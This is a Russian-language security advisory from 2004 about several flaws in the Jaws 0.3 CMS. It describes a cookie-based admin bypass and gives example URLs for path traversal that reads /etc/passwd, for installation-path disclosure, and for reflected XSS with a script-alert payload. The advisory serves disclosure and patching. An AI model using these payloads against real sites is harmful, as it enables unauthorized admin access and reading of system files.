Несколько уязвимостей в Jaws

Дата публикации:
07.07.2004
Всего просмотров:
912
Опасность:
Высокая
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Уязвимые версии: Jaws 0.3

Описание: Несколько уязвимостей обнаружено в Jaws. Удаленный пользователь может получить административный доступ. Удаленный пользователь может просматривать файлы на целевой системе. Удаленный пользователь может также определить инсталляционный путь и выполнить XSS нападение.

1. Удаленный пользователь может получить административный доступ к целевому приложению из за логической ошибки в функции logged_on(). Удаленный пользователь может установить специально обработанное значение Куки к MD5 хешу или нулевому значению, чтобы получить доступ через admin.php сценарий.

2. Просмотр произвольных файлов:

 http://127.0.0.1/jaws/index.php?gadget=../../../../../../. ./../../../etc/passwd%00&path=/etc
3. Определение инсталляционного пути:
 http://127.0.0.1/jaws/index.php?gadget=filebrowser&path=/etc
4. Раскрытие инсталляционного пути:
 http://127.0.0.1/jaws/include/config.php
5. XSS:
http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<b>bold letter</b>

http://127.0.0.1/jaws/index.php?gadget=[a valid gadget]&action=<script>alert('Colombia Rulx!!');</script>

URL производителя: http://www.jaws.com.mx/

Решение: Установите обновленную версию программы (0.3).

Ссылки: Multiples vulnerabilities in JAWS

или введите имя

CAPTCHA